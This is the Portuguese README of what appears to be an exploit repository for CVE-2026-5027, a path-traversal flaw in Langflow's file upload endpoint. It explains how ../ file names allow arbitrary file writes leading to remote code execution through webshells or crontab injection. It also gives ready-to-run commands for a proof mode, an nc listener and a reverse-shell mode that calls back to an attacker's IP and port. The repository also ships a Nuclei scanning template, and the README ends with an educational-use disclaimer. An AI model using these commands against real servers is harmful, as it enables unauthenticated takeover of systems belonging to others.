
CVE-2026-5027
Escrita Arbitrária de Arquivos para RCE
Execução Remota de Código Não Autenticada via Upload de Arquivo
Langflow sofre de uma vulnerabilidade crítica de path traversal no endpoint de upload de arquivos (POST /api/v2/files).
Um atacante pode enviar um nome de arquivo malicioso contendo sequências ../ para escrever arquivos arbitrários em qualquer lugar do sistema de arquivos do servidor.
Isso facilmente leva a Execução Remota de Código (RCE) total — por exemplo, enviando um webshell ou injetando no crontab.
/tmp)python3 CVE-2026-5027.py -t http://target:7860/ --proof
Saída esperada se vulnerável:
[+] Success! File written: ../../../tmp/CVE-2026-5027-proof.txt
# Start listener
nc -lvnp 4444
# Run exploit
python3 CVE-2026-5027.py -t http://target:7860/ --lhost YOUR_IP --lport 4444
| Arquivo | Descrição |
|---|---|
CVE-2026-5027.py | Exploit principal em Python (PoC + RCE) |
CVE-2026-5027.yaml | Template Nuclei para varredura |
README.md | Este arquivo |
Modo Prova
python3 CVE-2026-5027.py -t http://target.com/ --proof
Modo Reverse Shell
python3 CVE-2026-5027.py -t http://target.com/ --lhost 192.168.1.100 --lport 4444
Este repositório é apenas para fins educacionais e de testes de segurança autorizados.
Use com responsabilidade e apenas em sistemas para os quais você tenha permissão explícita para testar.
Feito com ❤️ para a comunidade red team